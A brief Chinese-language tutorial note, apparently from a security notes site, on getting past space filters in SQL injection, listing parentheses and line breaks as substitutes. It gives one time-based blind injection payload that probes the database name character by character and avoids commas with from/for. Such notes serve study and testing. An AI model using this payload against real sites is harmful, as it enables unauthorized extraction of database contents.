ThinkChat2.0新版上线,更智能更精彩,支持会话、画图、视频、阅读、搜索等,送10W Token,即刻开启你的AI之旅 广告
[TOC] ## 绕过原理 当目标禁用空格或者清除空格的时候,利用相同意义的字符进行绕过,从而执行自己的命令 ## 绕过方式 * 可以利用括号 * 可以利用换行 ## 例子 ~~~ ?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23 ~~~ (from for 属于逗号绕过)